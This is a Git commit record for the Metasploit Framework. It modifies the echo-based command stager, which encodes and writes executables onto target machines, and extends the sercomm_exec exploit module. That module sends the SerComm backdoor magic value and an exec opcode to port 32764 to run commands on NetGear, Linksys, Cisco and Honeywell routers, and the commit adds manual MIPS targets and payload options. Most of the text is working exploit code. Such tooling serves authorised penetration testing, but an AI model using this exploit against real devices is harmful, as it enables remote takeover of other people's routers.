Merge pull request #4 from jvazquez-r7/review_2874

mandreko · mandreko · commit f6f2da09aa4f · 2014-01-16T13:57:59.000-08:00
Clean CmdStagerEcho and Add module targets
diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb
@@ -10,6 +10,11 @@ module Exploitation
 
 class CmdStagerEcho < CmdStagerBase
 
+  ENCODINGS = {
+    'hex'   => "\\\\x",
+    'octal' => "\\\\"
+  }
+
   def initialize(exe)
     super
 
@@ -18,12 +23,21 @@ def initialize(exe)
 
   #
   # Override to ensure opts[:temp] is a correct *nix path
+  # and initialize opts[:enc_format].
   #
   def generate(opts = {})
     opts[:temp] = opts[:temp] || '/tmp/'
     opts[:temp].gsub!(/\\/, "/")
     opts[:temp] = opts[:temp].shellescape
     opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+
+    # by default use the 'hex' encoding
+    opts[:enc_format] = opts[:enc_format] || 'hex'
+
+    unless ENCODINGS.keys.include?(opts[:enc_format])
+      raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
+    end
+
     super
   end
 
@@ -36,9 +50,18 @@ def generate_cmds(opts)
     unless opts[:noargs]
       @cmd_start += "-en "
     end
+
     @cmd_end   = ">>#{@tempdir}#{@var_elf}"
-    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    xtra_len = @cmd_start.length + @cmd_end.length
     opts.merge!({ :extra => xtra_len })
+
+    @prefix = ENCODINGS[opts[:enc_format]]
+    min_part_size = 5 # for both encodings
+
+    if (opts[:linemax] - opts[:extra]) < min_part_size
+      raise RuntimeError, "CmdStagerEcho - Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
+    end
+
     super
   end
 
@@ -47,15 +70,14 @@ def generate_cmds(opts)
   # Encode into a format that echo understands, where
   # interpretation of backslash escapes are enabled. For
   # hex, it'll look like "\\x41\\x42", and octal will be
-  # "\\101\\102"
+  # "\\101\\102\\5\\41"
   #
   def encode_payload(opts)
-    opts[:enc_format] = opts[:enc_format] || 'hex'
     case opts[:enc_format]
     when 'octal'
-      return Rex::Text.to_octal(@exe, "\\\\")
+      return Rex::Text.to_octal(@exe, @prefix)
     else
-      return Rex::Text.to_hex(@exe, "\\\\x")
+      return Rex::Text.to_hex(@exe, @prefix)
     end
   end
 
@@ -104,24 +126,34 @@ def slice_up_payload(encoded, opts)
     while (encoded_dup.length > 0)
       temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
       # cut the end of the part until we reach the start
-      # of a full byte representation "\\xYZ" or "\\YZ"
-      case opts[:enc_format]
-        when 'octal'
-          while (temp.length > 0 && temp[-4, 2] != "\\\\")
-            temp.chop!
-          end
-        else
-          while (temp.length > 0 && temp[-5, 3] != "\\\\x")
-           temp.chop!
-          end
-      end
+      # of a full byte representation "\\xYZ" or "\\YZX"
+      temp = fix_last_byte(temp, opts, encoded_dup)
       parts << temp
       encoded_dup.slice!(0, temp.length)
     end
 
     parts
   end
 
+  def fix_last_byte(part, opts, remaining="")
+    fixed_part = part.dup
+
+    case opts[:enc_format]
+    when 'hex'
+      while (fixed_part.length > 0 && fixed_part[-5, @prefix.length] != @prefix)
+        fixed_part.chop!
+      end
+    when 'octal'
+      if remaining.length > fixed_part.length and remaining[fixed_part.length, @prefix.length] != @prefix
+        pos = fixed_part.rindex('\\')
+        pos -= 1 if fixed_part[pos-1] == '\\'
+        fixed_part.slice!(pos..fixed_part.length-1)
+      end
+    end
+
+    return fixed_part
+  end
+
   def cmd_concat_operator
     " ; "
   end
diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb
@@ -17,8 +17,8 @@ def initialize(info={})
       'Description'    => %q{
         This module will cause remote code execution on several SerComm devices.
         These devices typically include routers from NetGear and Linksys.
-        This module was tested successfully against the NetGear DG834 series
-        ADSL modem router.
+        This module was tested successfully against several NetGear, Honeywell
+        and Cisco devices.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -47,6 +47,16 @@ def initialize(info={})
               'PackFormat' => 'NNN'
             }
           ],
+          ['Manual Linux MIPS Big Endian',
+            {
+              'Arch' => ARCH_MIPSBE
+            }
+          ],
+          ['Manual Linux MIPS Little Endian',
+            {
+              'Arch' => ARCH_MIPSLE
+            }
+          ],
           ['Cisco WAP4410N',
             {
               # Note this target is little endian by network comm, but
@@ -65,7 +75,7 @@ def initialize(info={})
             {
               'Arch' => ARCH_MIPSBE,
               'PackFormat' => 'VVV',
-              'NoArgs' => true,
+              'NoArgs' => true
             }
           ],
           ['Netgear DG834G',
@@ -107,7 +117,7 @@ def initialize(info={})
               'UploadPath' => '/var',
               'PayloadEncode' => 'octal'
             }
-          ],
+          ]
         ],
       'DefaultTarget'  => 0,
       'References'     =>
@@ -121,6 +131,15 @@ def initialize(info={})
         [
           Opt::RPORT(32764)
         ], self.class)
+
+      register_advanced_options(
+        [
+          OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
+          OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
+          OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
+          OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
+        ], self.class)
+
   end
 
   def check
@@ -139,10 +158,23 @@ def check
   end
 
   def exploit
+    if target.name =~ /Manual/
+      print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")
+      @no_args = datastore['NOARGS']
+      @upload_path = datastore['UPLOADPATH']
+      @encoding_format = datastore['ENCODING']
+      @pack_format = datastore['PACKFORMAT']
+    else
+      @no_args = target['NoArgs']
+      @upload_path = target['UploadPath']
+      @encoding_format = target['PayloadEncode']
+      @pack_format = target['PackFormat']
+    end
+
     execute_cmdstager(
-      :noargs => target['NoArgs'],
-      :temp => target['UploadPath'],
-      :enc_format => target['PayloadEncode']
+      :noargs => @no_args,
+      :temp => @upload_path,
+      :enc_format => @encoding_format
     )
   end
 
@@ -176,7 +208,7 @@ def execute_command(cmd, opts)
     # 0x53634d4d  => Backdoor code
     # 0x07        => Exec command
     # cmd_length  => Length of command to execute, sent after communication struct
-    data = [0x53634d4d, 0x07, cmd_length].pack(target['PackFormat'])
+    data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)
 
     connect
     # Send command structure followed by command text
